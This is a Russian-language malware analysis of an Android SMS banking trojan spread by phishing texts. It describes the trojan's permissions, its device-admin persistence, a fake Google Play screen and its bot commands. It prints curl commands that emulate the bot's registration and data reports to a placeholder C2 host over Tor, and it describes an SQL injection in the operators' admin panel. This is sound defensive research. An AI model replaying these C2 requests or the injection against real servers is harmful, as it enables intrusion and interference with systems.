Исследование распространенной малвари под Android
Часто вирусы для android приходят к нам при помощи рассылок. Раньше это были СМС, а теперь еще и современные мессенджеры. Мне было интересно посмотреть, что же сейчас на рынке вредоноса, поэтому зарегистрировалась и подала пару объявлений на avito. Спустя пару дней после публикации мне позвонили из салона красоты Desheli и пригласили на бесплатную процедуру, вроде как подарок от кого-то из друзей. Смысл в том, что после процедуры они крайне настойчиво уговаривают взять кредит на их косметику. Тема старая, избитая, но все еще работает. А после позвонили еще из чего-то подобного, только тут уже честно сказали, что база номеров набирается автоматически. Всякий раз, как спрашивала название их конторы, начинался ужасный шум, явно не просто так. То, что номер взяли с avito, было понятно, потому что ко мне обращались по тому имени, что я написала в объявлении.
А то, ради чего это все затевалось, пришло только через пару недель. Мне прислали почти подряд 3 смс примерно одинакового содержания.
Что примечательно, из 3 ссылок доступна была только одна, при том, что попытка скачать была сразу же после получения смс.
Скаченный avito.apk весит 437кб. Это много. Такой размер оказался из-за библиотеки android.support.v7, которая тут не нужна. Если её убрать, будет
50кб. Отчет virustotal Судя по количеству детектов, сомнений быть не может — это зловред, еще и не обфусцированный
Начнем с AndroidManifest.xml
Смотрим права, которые запрашиваются при установке приложения:
Все права ожидаемы, кроме android.permission.VIBRATE, потому что обычно все стараются скрывать свое присутствие в системе. После детального осмотра кода выяснилось, что есть еще не используемый запрос android.permission.WRITE_EXTERNAL_STORAGE. Скорее всего, из кода удаляли лишнее или заготовили и не дописали.
Дальше по манифесту DEVICE_ADMIN
Таким образом, приложение помечается как администратор устройства и его нельзя удалить, пока не сняты права в Настройки-Безопасность-Администраторы устройства
Запрос прав происходит с текстом:
«Условия использования Google Play. Бесплатный Контент. Google может разрешать бесплатно загружать или использовать Контент. К бесплатному Контенту применяются те же условия, что и к купленному, кроме положений, связанных с оплатой (например, к бесплатному Контенту не применяются положения данных Условий о возврате уплаченной цены). Google может налагать ограничения на ваш доступ к определенному бесплатному Контенту и на его использование вами.»
А отключение прав — «Если вы продолжите, могут возникнуть проблемы при работе с приложениями! Вы уверены, что хотите продолжить?» На самом деле никаких проблем не будет. Это последний шанс отговорить пользователя.
Если отказаться, попросит еще раз.
Дальше видим фейк на Google Play, выполненный в старом дизайне, еще доматериальном.
android.provider.Telephony.SMS_RECEIVED — получение смс, приоритет выставлен не максимальный android.intent.action.BOOT_COMPLETED — для автозапуска после загрузки устройства android.intent.action.USER_PRESENT — пользователь разблокировал устройство android.intent.action.PHONE_STATE, android.intent.action.NEW_OUTGOING_CALL — отслеживание звонков пользователя
Устанавливаем, разрешаем администратора устройства, дальше ожидается, что приложение будет спрятано на устройстве. Но оно остается в списке приложений, его даже запустить можно. Подразумевается, что это должно успокоить пользователя. Скорее всего, разработчик не смог вызвать Activity с запросом прав администратора и решил вывести ошибку.
К сожалению, автозалива по сбербанку у бота не оказалось, владелец посылает команды руками. Сначала идет запрос на регистрацию бота
curl --socks5 127.0.0.1:9050 --data "mode=register&prefix=1&version_sdk=123.4.4(Bot.v.4.2)&imei=1234567890123&country=ru&number=null&operator=Beeline" url.com/controller.php
После чего боту присваивается порядковый номер и пароль. На момент, когда начала анализ, было 350 пользователей.
Дальше идет запрос команды
Отвечаем балансом карты:
curl --socks5 127.0.0.1:9050 --data "mode=setSaveInboxSms&number=900&text=VISA1234 Баланс:23000р.&time=2016-01-27 20:01:15&status_sms=1&sms_mode=2&bid=1234" url.com/controller.php
После отправки запроса о балансе и повторного запроса команды выдается команда на перехват смс.
Запрос баланса сбербанка идет в автоматическом режиме. Какие-либо иные команды также на ручном управлении.
Получение команды. Тут следовало бы использовать case, но автор не в курсе, как сравнивать строки в JAVA
set_intercept — включает перехват смс на устройстве И проверка фильтра, по которому идет перехват сообщений
И если уж перебирать все варианты, то где еще 5? Для сравнений строк независимо от регистра следовало бы использовать compareToIgnoreCase
setInterval — изменение времени отклика к гейту
send_sms Отправка смс реализована несколько криво. Не поддерживает отправку составных смс — максимальная длина 70 символов русскими буквами. Рассылку по контактам будет делать неудобно.
set_server — меняет адрес гейта, записывается в SharedPreference
upsmlist, upcatsm — отправляют все входящие и исходящие смс в формате json на сервер
changeNotify — посылает пользователю push уведомление с заданным текстом с иконкой от google play. Вот тут вызывается Activity с фейком google play. Команда на вызов фейка мне не пришла, а собрать пустое приложение с xml фейка не получилось. Похоже при декомпиляции поломался. Ничего интересного в нем все равно нет. Провека на валидность по алгоритму Луна, год, etc
get_ussd Android не имеет API для получения ответа от USSD команд. Т.е. команду выполнит, но получить текст из ответа нельзя. Тут есть 2 решения проблемы — или через специальные возможности, или подключить стороннюю библиотеку IExtendedNetworkService.aidl. Спец.возможности работают, начиная с 4 версии android, требуют включения отдельной опции в настройках и перехватывают все всплывающие окна без исключения. Также эти уведомления можно глобально подавить. С библиотекой все проще, она ловит, когда это требуется, и работает, начиная с 2 версии андроида. Но слухи о её работоспособности сильно преувеличены. При этом перехват ответа от USSD может понадобиться только для получения баланса симкарты. USSD команды сбербанка работают таким образом, что и код подтверждения, и ответ будут отправлены по смс.
В боте же USSD команда выполняется как факт. Команда прошла или ексепшен. Результат тут не будет получен.
timer_msg — отправка смс по таймеру
Бот имеет скрытый потенциал, функции которые не используются:
downloadFile, installApk — лоадер getContacts — сбор номеров из телефонной книги openUrl — вызов браузера с заданным адресом
После анализа бота, скинула посмотреть ссылку на админку letm.
Увидев разрешенный dir listng, решил поискать сервак где не интерпретируется php код, чтобы получить исходники. В итоге нашел на ргхосте незапароленный архив с исходным кодом. Быстро прошелся по исходникам — большинство параметров фильтруется и проведение атаки невозможно. Но попался один момент где фильтруемый парамер перестал быть таковым. Разработчик заместо того, чтобы использовать фильтруемый параметр в качестве аргумента в функции предпочел взять то же параметр, но без фильтра. Сама функция помещает информацию о балансе в базу данных. Тот самый параметр, который передается без фильтра дальше проходит через регулярное выражение preg_match( '/Балансы: (.*?) руб./is', $message, $links) то что у нас в (.*?) затем будет использовано в запросе к базе данных. Такое регулярное выражение позволяет нам использовать произвольный текст, в данном случае это инъекция. При помощи инъекции мы можем писать произвольные данные в таблицу в тот числе из других таблиц, что очевидно. Проблема состоит как в дальнейшем их просмотреть, в скрипте выключен показ ошибок. Нужно искать момент доступный для пользователя без авторизации. И такой имеется в регистрации бота. Если бот уже был зарегистрирован, в выводе нам покажет его пароль. Что мы и делаем при помощи инъекции — обновляем свой пароль, отсылаем пакет регистрации повторно и получаем вывод В итоге написал сплоит, который вытаскивает текущего юзера и версию